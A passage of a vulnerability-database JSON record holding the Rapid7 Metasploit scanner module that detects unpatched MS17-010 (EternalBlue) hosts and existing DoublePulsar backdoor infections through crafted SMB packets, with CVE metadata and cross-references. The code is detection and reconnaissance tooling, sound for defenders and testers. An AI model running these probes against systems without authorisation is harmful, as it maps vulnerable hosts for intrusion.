::Exception => e\n vprint_error(\"#{e.class}: #{e.message}\")\n ensure\n disconnect\n end\n\n checkcode\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n return simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_probe(tree_id)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(tree_id)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def do_smb_ms17_010_probe(tree_id)\n # request transaction with fid = 0\n pkt = make_smb_trans_ms17_010(tree_id)\n sock.put(pkt)\n bytes = sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n # convert error code to string\n code = pkt['SMB'].v['ErrorClass']\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\n\n return smberr.get_error(code)\n end\n\n def make_smb_trans2_doublepulsar(tree_id)\n # make a raw transaction packet\n # this one is a trans2 packet, the checker is trans\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x0e = SESSION_SETUP\n setup = \"\\x0e\\x00\\x00\\x00\"\n setup_count = 1 # 1 word\n trans = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['MultiplexID'] = 65\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['Timeout'] = 0x00a4d9a6\n pkt['Payload'].v['ParamCountTotal'] = 12\n pkt['Payload'].v['ParamCount'] = 12\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamOffset'] = 66\n pkt['Payload'].v['DataOffset'] = 78\n\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\n\n def make_smb_trans_ms17_010(tree_id)\n # make a raw transaction packet\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x23 = PeekNamedPipe, fid = 0\n setup = \"\\x23\\x00\\x00\\x00\"\n setup_count = 2 # 2 words\n trans = \"\\\\PIPE\\\\\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['ParamCountMax'] = 0xffff\n pkt['Payload'].v['DataCountMax'] = 0xffff\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataOffset'] = data_offset\n\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/smb/smb_ms17_010.rb", "title": "MS17-010 SMB RCE Detection", "type": "metasploit", "viewCount": 3094}, "differentElements": ["cvss", "references", "description", "cvelist", "published", "modified", "sourceHref", "sourceData", "title"], "edition": 21, "lastseen": "2019-05-29T23:03:37"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user \"\\\" and connect to IPC$.\n", "enchantments": {"dependencies": {"modified": "2019-12-23T08:55:16", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-12-23T08:55:16", "value": 4.1, "vector": "NONE"}}, "hash": "f29ae96a02a12383c7953b1314397280", "history": [], "href": "", "id": "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "lastseen": "2019-12-23T08:55:16", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T19:19:33", "objectVersion": "1.4", "published": "2017-03-29T22:24:59", "references": ["https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/countercept/doublepulsar-detection-script", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/smb/smb_ms17_010.rb", "title": "MS17-010 SMB RCE Detection", "type": "metasploit", "viewCount": 3573}, "differentElements": ["sourceData"], "edition": 48, "lastseen": "2019-12-23T08:55:16"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user \"\\\" and connect to IPC$.\n", "enchantments": {"dependencies": {"modified": "2020-04-12T00:02:58", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/BROWSER/MS08_053_MEDIAENCODER", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-04-12T00:02:58", "rev": 2, "value": 4.4, "vector": "NONE"}}, "hash": "7f41373b73b89844d795a75d968d4fd4", "history": [], "href": "", "id": "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "lastseen": "2020-04-12T00:02:58", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T19:19:33", "objectVersion": "1.4", "published": "2017-03-29T22:24:59", "references": ["https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/countercept/doublepulsar-detection-script", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Client::PipeAuditor\n\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 SMB RCE Detection',\n 'Description' => %q{\n Uses information disclosure to determine if MS17-010 has been patched or not.\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\n not have the MS17-010 patch.\n\n If the machine is missing the MS17-010 patch, the module will check for an\n existing DoublePulsar (ring 0 shellcode/malware) infection.\n\n This module does not require valid SMB credentials in default server\n configurations. It can log on as the user \"\\\" and connect to IPC$.\n },\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Luke Jennings' # DoublePulsar detection Python code\n ],\n 'References' =>\n [\n [ 'CVE', '2017-0143'],\n [ 'CVE', '2017-0144'],\n [ 'CVE', '2017-0145'],\n [ 'CVE', '2017-0146'],\n [ 'CVE', '2017-0147'],\n [ 'CVE', '2017-0148'],\n [ 'MSB', 'MS17-010'],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n [ 'URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\n ],\n 'License' => MSF_LICENSE,\n 'Notes' =>\n {\n 'AKA' => [\n 'DOUBLEPULSAR',\n 'ETERNALBLUE'\n ]\n }\n ))\n\n register_options(\n [\n OptBool.new('CHECK_DOPU', [false, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),\n OptBool.new('CHECK_ARCH', [false, 'Check for architecture on vulnerable hosts', true]),\n OptBool.new('CHECK_PIPE', [false, 'Check for named pipe on vulnerable hosts', false])\n ])\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 'x86 (32-bit)' : 'x64 (64-bit)'\n end\n\n def run_host(ip)\n checkcode = Exploit::CheckCode::Unknown\n\n begin\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\n\n tree_id = do_smb_setup_tree(ipc_share)\n vprint_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\n\n status = do_smb_ms17_010_probe(tree_id)\n vprint_status(\"Received #{status} with FID = 0\")\n\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\n os = simple.client.peer_native_os\n\n if datastore['CHECK_ARCH']\n case dcerpc_getarch\n when ARCH_X86\n os << ' x86 (32-bit)'\n when ARCH_X64\n os << ' x64 (64-bit)'\n end\n end\n\n print_good(\"Host is likely VULNERABLE to MS17-010! - #{os}\")\n\n checkcode = Exploit::CheckCode::Vulnerable\n\n report_vuln(\n host: ip,\n port: rport, # A service is necessary for the analyze command\n name: self.name,\n refs: self.references,\n info: \"STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$ - #{os}\"\n )\n\n # vulnerable to MS17-010, check for DoublePulsar infection\n if datastore['CHECK_DOPU']\n code, signature1, signature2 = do_smb_doublepulsar_probe(tree_id)\n\n if code == 0x51\n xor_key = calculate_doublepulsar_xor_key(signature1).to_s(16).upcase\n arch = calculate_doublepulsar_arch(signature2)\n print_warning(\"Host is likely INFECTED with DoublePulsar! - Arch: #{arch}, XOR Key: 0x#{xor_key}\")\n report_vuln(\n host: ip,\n name: \"MS17-010 DoublePulsar Infection\",\n refs: self.references,\n info: \"MultiPlexID += 0x10 on Trans2 request - Arch: #{arch}, XOR Key: 0x#{xor_key}\"\n )\n end\n end\n\n if datastore['CHECK_PIPE']\n pipe_name, _ = check_named_pipes(return_first: true)\n\n return unless pipe_name\n\n print_good(\"Named pipe found: #{pipe_name}\")\n\n report_note(\n host: ip,\n port: rport,\n proto: 'tcp',\n sname: 'smb',\n type: 'MS17-010 Named Pipe',\n data: pipe_name\n )\n end\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\n print_error(\"Host does NOT appear vulnerable.\")\n else\n print_error(\"Unable to properly detect if host is vulnerable.\")\n end\n\n rescue ::Interrupt\n print_status(\"Exiting on interrupt.\")\n raise $!\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\n rescue ::Exception => e\n vprint_error(\"#{e.class}: #{e.message}\")\n ensure\n disconnect\n end\n\n checkcode\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n return simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_probe(tree_id)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(tree_id)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def do_smb_ms17_010_probe(tree_id)\n # request transaction with fid = 0\n pkt = make_smb_trans_ms17_010(tree_id)\n sock.put(pkt)\n bytes = sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n # convert error code to string\n code = pkt['SMB'].v['ErrorClass']\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\n\n return smberr.get_error(code)\n end\n\n def make_smb_trans2_doublepulsar(tree_id)\n # make a raw transaction packet\n # this one is a trans2 packet, the checker is trans\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x0e = SESSION_SETUP\n setup = \"\\x0e\\x00\\x00\\x00\"\n setup_count = 1 # 1 word\n trans = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['MultiplexID'] = 65\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['Timeout'] = 0x00a4d9a6\n pkt['Payload'].v['ParamCountTotal'] = 12\n pkt['Payload'].v['ParamCount'] = 12\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamOffset'] = 66\n pkt['Payload'].v['DataOffset'] = 78\n\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\n\n def make_smb_trans_ms17_010(tree_id)\n # make a raw transaction packet\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x23 = PeekNamedPipe, fid = 0\n setup = \"\\x23\\x00\\x00\\x00\"\n setup_count = 2 # 2 words\n trans = \"\\\\PIPE\\\\\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['ParamCountMax'] = 0xffff\n pkt['Payload'].v['DataCountMax'] = 0xffff\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataOffset'] = data_offset\n\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/smb/smb_ms17_010.rb", "title": "MS17-010 SMB RCE Detection", "type": "metasploit", "viewCount": 3929}, "differentElements": ["modified", "sourceData"], "edition": 53, "lastseen": "2020-04-12T00:02:58"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user \"\\\" and connect to IPC$.\n", "enchantments": {"dependencies": {"modified": 